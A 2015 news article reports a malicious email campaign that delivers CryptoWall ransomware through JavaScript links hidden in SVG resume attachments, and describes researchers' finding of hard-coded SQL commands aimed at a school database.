Analysts find SQL commands hard coded in the malware

May 23, 2015 06:50 GMT  ·  By

A recently discovered malicious email campaign revealed a less common method to deliver malware by using SVG files (images with support for interactive and animation features), to hide links to downloading crypto-malware.

Researchers that caught a sample email and analyzed the behavior of the nasty SVG say that the payload appears to be CryptoWall, judging by some indicators associated with this malware family.

The ransom message displayed to the victim after data encryption completes also points to this particular threat. The demand is $700 / €635.

Malware host available in SVG's JavaScript code

The email contains the typical lure of someone claiming to send their resume. The text is brief and points the recipient to the malicious attachment. Infecting the computer requires user interaction.

SVG (Scalable Vector Graphics) have support for JavaScript, which the attackers took advantage of to include the links to the location hosting the ransomware with file encryption capabilities.

Researchers at AppRiver analyzed the downloaded file and discovered that it contained hard coded SQL commands, pointing to a potential school’s database. The experts had halted attacks with this malware before, which targeted schools, Jonathan French said in a blog post.

SQL commands suggest attack on school database

“While it’s possible the malware had other intentions from encrypting in mind, like to wreak havoc in an SQL database, this was from a strings output so it was all plain text and the table naming conventions just seem a little too plain as well. However, someone knowing SQL table names or a school using a plain naming convention could be problematic if the malware were to attempt to attain access and do its thing,” the researcher explains.

The SQL commands identified in the malware code would definitely be damaging to a database, allowing the attacker to insert or delete entries.

On the other hand, this could also be used as a decoy to make analysis more difficult, as malware authors resort to adding legitimate functions that would throw researchers off track.

This would be a more likely scenario because none of the commands was activated during AppRiver’s analysis.